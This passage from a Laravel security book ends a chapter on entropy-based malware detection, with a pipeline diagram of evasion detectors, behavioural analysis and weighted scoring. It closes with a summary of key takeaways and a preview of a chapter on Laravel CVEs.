└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│ 3. Entropy Analysis         │  5 evasion detectors
│ ├─ CommentPadding           │
│ ├─ VariableNameEngineering  │
│ ├─ ChunkedPayload           │
│ ├─ StringSteganography      │
│ └─ WhitespaceManipulation   │
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│ 4. Behavioral Analysis      │  Data flow tracking
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│ 5. Weighted Scoring         │  Combine all signals
│    + Context Modifiers      │  Adjust for location
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│ 6. Recommendation           │  QUARANTINE/REVIEW/MONITOR/CLEAN
└─────────────────────────────┘
Summary
Signatures are necessary but insufficient. Modern malware uses sophisticated evasion techniques, and each one needs its own countermeasure.
Key takeaways:
- Comment padding, variable engineering, and whitespace manipulation artificially lower entropy
- Chunked payloads distribute high-entropy content across the file
- String steganography hides data in invisible characters
- Sliding window analysis catches local anomalies even when global entropy looks normal
- Behavioral analysis detects what code does, not what it looks like
- Weighted scoring combines multiple signals for accurate detection
- Context modifiers prevent false positives in legitimate framework code
The lesson is clear: layers of defense, not single techniques.
Next: Chapter 6 - The 12 CVEs Every Laravel Developer Must Know
Entropy analysis catches obfuscation. But what about vulnerabilities in Laravel itself? The next chapter covers the critical CVEs every Laravel developer must patch.